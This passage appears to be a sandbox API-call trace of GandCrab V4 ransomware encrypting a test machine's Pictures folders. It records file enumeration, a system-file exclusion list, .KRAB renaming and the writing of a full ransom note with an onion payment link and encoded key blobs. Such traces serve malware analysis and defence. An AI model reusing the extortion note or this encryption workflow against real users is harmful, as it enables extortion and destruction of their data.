KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0094.887] WriteFile (in: hFile=0x434, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338efa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338efa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0094.887] CloseHandle (hObject=0x434) returned 1 [0094.887] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.888] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.888] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2a, wMilliseconds=0x5a)) [0094.888] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.888] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0094.888] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0094.889] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\d2ca4a08d2ca4dee3d.lock") returned 66 [0094.889] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\camera roll\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x434 [0096.868] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.868] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.868] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\") returned 43 [0096.869] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\*" [0096.869] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\*", lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0xfbd3e0 [0096.869] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.869] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0096.869] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.869] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.869] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0096.869] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0096.869] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0096.869] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\d2ca4a08d2ca4dee3d.lock" [0096.869] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0096.869] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 71 [0096.870] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\d2ca4a08d2ca4dee3d.lock") returned 66 [0096.870] lstrlenW (lpString=".lock") returned 5 [0096.870] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0096.870] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0096.870] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.870] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.871] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0096.871] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0096.871] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0096.871] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\desktop.ini" [0096.871] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0096.871] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\desktop.ini.KRAB") returned 59 [0096.871] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\desktop.ini") returned 54 [0096.871] lstrlenW (lpString=".ini") returned 4 [0096.871] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0096.872] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ini ") returned 5 [0096.872] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.872] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\desktop.ini") returned 54 [0096.872] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\desktop.ini") returned 54 [0096.872] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0096.872] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.872] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0096.872] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0096.872] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0096.872] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\KRAB-DECRYPT.txt" [0096.872] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0096.873] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\KRAB-DECRYPT.txt.KRAB") returned 64 [0096.873] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\KRAB-DECRYPT.txt") returned 59 [0096.873] lstrlenW (lpString=".txt") returned 4 [0096.873] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0096.873] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0096.873] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.874] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\KRAB-DECRYPT.txt") returned 59 [0096.874] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\KRAB-DECRYPT.txt") returned 59 [0096.874] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.874] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.874] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0096.874] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.874] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.874] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.874] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0096.874] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0096.874] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0096.874] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0096.874] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.874] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0 [0096.874] FindClose (in: hFindFile=0xfbd3e0 | out: hFindFile=0xfbd3e0) returned 1 [0096.875] CloseHandle (hObject=0x434) returned 1 [0096.875] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0096.875] lstrcmpW (lpString1="cLa7oJk", lpString2=".") returned 1 [0096.875] lstrcmpW (lpString1="cLa7oJk", lpString2="..") returned 1 [0096.875] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\", lpString2="cLa7oJk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk" [0096.875] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\" [0096.875] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0096.875] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.875] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.875] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.875] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.876] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.876] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0096.876] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\\\KRAB-DECRYPT.txt") returned 56 [0096.876] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0096.877] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0096.877] WriteFile (in: hFile=0x434, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338efa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338efa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0096.878] CloseHandle (hObject=0x434) returned 1 [0096.878] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.878] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0096.878] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2c, wMilliseconds=0x52)) [0096.879] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0096.879] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.879] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.879] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\d2ca4a08d2ca4dee3d.lock") returned 62 [0096.879] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x434 [0096.880] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.880] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.880] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\") returned 39 [0096.880] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\*" [0096.880] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\*", lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0xfbd7a0 [0096.881] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.881] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0096.881] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.881] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.881] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0096.881] lstrcmpW (lpString1="3ZrDCz9Yil.png", lpString2=".") returned 1 [0096.881] lstrcmpW (lpString1="3ZrDCz9Yil.png", lpString2="..") returned 1 [0096.881] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\", lpString2="3ZrDCz9Yil.png" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\3ZrDCz9Yil.png") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\3ZrDCz9Yil.png" [0096.881] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0096.881] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\3ZrDCz9Yil.png.KRAB") returned 58 [0096.881] lstrlenW 